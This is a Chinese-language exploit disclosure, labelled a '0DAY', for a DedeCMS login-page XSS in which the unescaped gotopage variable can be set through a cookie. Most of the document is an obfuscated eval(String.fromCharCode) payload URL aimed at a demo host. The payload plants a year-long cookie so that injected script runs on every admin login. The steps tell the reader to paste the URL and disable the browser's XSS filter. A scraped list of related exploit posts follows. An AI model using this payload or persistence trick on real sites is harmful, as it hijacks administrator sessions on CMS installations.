DEDECMS全版本gotopage变量XSS ROOTKIT 0DAY
影响版本:
DEDECMS全版本
漏洞描叙:
DEDECMS后台登陆模板中的gotopage变量未效验传入数据,导致XSS漏洞。
\dede\templets\login.htm
65行左右
<input type="hidden" name="gotopage" value="<?php if(!empty($gotopage)) echo $gotopage;?>" />
由于DEDECMS的全局变量注册机制,该变量内容可以被COOKIE变量覆盖,COOKIE可以在客户端持久化存储,最终导致一个XSS ROOTKIT。
漏洞危害:
管理员在触发DEDECMS任意的XSS漏洞(如留言本XSS)后,可以通过该漏洞永久劫持覆盖gotopage变量,在DEDECMS的后台登陆页面永久嵌入任意的恶意代码。
验证:
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
参考:
深掘XSS漏洞场景之XSS Rootkit[完整修订版]
http://www.80sec.com/%e6%b7%b1%e6%8e%98xss%e6%bc%8f%e6%b4%9e%e5%9c%ba%e6%99%af%e4%b9%8bxss-rootkit-%e4%bf%ae%e8%ae%a2.html
DEDECMS全版本gotopage变量XSS ROOTKIT 0DAY相关推荐
- /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -
DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...
- ECSHOP全版本注入漏洞分析
ECSHOP全版本注入漏洞分析 2014-04-03 10:34:52| 分类: Pentest-skills |举报 |字号 订阅 下载LOFTER 我的照片书 | 初学PHP,看了两天语法,找 ...
- ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
ThinkPHP 5.0.x.5.1.x.5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架.借鉴Struts框架的Action对象,同 ...
- thinkphp5运行原理_ThinkPHP5.1~5.2全版本远程代码执行高危漏洞预警
漏洞综述 关于ThinkPHP ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架,其借鉴了国外很多优秀的框架和模式,包括使用面向对象的开发结构和MVC模式,融合了Struts的思想和 ...
- 如何查看python有哪些内置函数_如何查看 Python 全部内置变量和内置函数?
查看python内置函数的方法:1.打开Python IDLE编辑器:2.输入" dir(__builtins__)"命令,按下回车键(Enter)得到Python全部内置变量和函 ...
- 我的世界服务器修改游戏难度,[娱乐|其它]TrueLife —— 我的世界服务器提高生存难度插件 让MineCraft更真实 [全版本]...
插件概括 为游戏添加了口渴值,疲劳值和病毒值,口渴值和疲劳值随着时间的推移而增加,到达一定程度会有负面Buff(可自定义),需要喝水或睡觉来补充,并且还有计分板来显示! 详细说明: 口渴值:随时间的推 ...
- oracle oaf界面个性化,个性化EBS标准OAF页面(EO,+SQL全版本).doc
个性化EBS标准OAF页面(EO,SQL全版本) 个性化EBS标准OAF页面 目录 个性化EBS标准OAF页面1 目录1 替换VO添加客户化属性(VO基于EO的版本)3 实例背景3 本例的页面:3 E ...
- python 内置函数 builtins_如何查看 Python 全部内置变量和内置函数?
查看python内置函数的方法:1.打开Python IDLE编辑器:2.输入" dir(__builtins__)"命令,按下回车键(Enter)得到Python全部内置变量和函 ...
- R语言ggplot2可视化:使用ggplot2按照热力图的方式显示全是分类变量的dataframe数据、并自定义因子(factor)的图例颜色legend
R语言ggplot2可视化:使用ggplot2按照热力图的方式显示全是分类变量的dataframe数据.并自定义因子(factor)的图例颜色legend(use heatmap to visuali ...
最新文章
- 【组合数学】生成函数 ( 正整数拆分 | 无序 | 有序 | 允许重复 | 不允许重复 | 无序不重复拆分 | 无序重复拆分 )
- VLC-DSS搭建直播系统中链路断开影响测试
- python练习题:使用循环和函数实现一个摇骰子小游戏
- 写给后端程序员的HTTP缓存原理介绍
- Mongodb千万级数据在python下的综合压力测试及应用探讨
- antd form rules字数限制_Package - antd-form-rules
- 前端开发桌面终极工具(FastStone Capture)推荐(转)
- [NVIDIA] Ubuntu 16.04 安装 nvidia-384 + cuda-9.0
- eplan加密狗已损坏_EPLAN Electric P8 仿真加密狗 error 1068 问题
- find命令过滤 no such_Linux中find命令的用法入门
- 我要学ASP.NET MVC 3.0(十三): MVC 3.0 防止跨站点请求伪造 (CSRF) 攻击
- 图像变形功能的应用: 在线修整发型
- 计算机如何添加gust用户,win7系统如何创建安全的Guest账户
- 标准成本和移动平均价的误区
- WRMPS经典Cookie欺骗漏洞批量拿下shell-黑客博客
- 桌上有一空盘,最多允许存放一个水果。爸爸可向盘中放一个苹果或放一个桔子,儿子专等吃盘中的桔子,女儿专等吃苹果。	试用P、V操作实现爸爸、儿子、女儿三个并发进程的同步。
- 精品网站社区地址集合
- 记一个实际运用反射的例子
- 洛谷P1209 [USACO1.3]修理牛棚 Barn Repair----解题报告
- 什么是BOM?与焊盘不匹配,怎么办?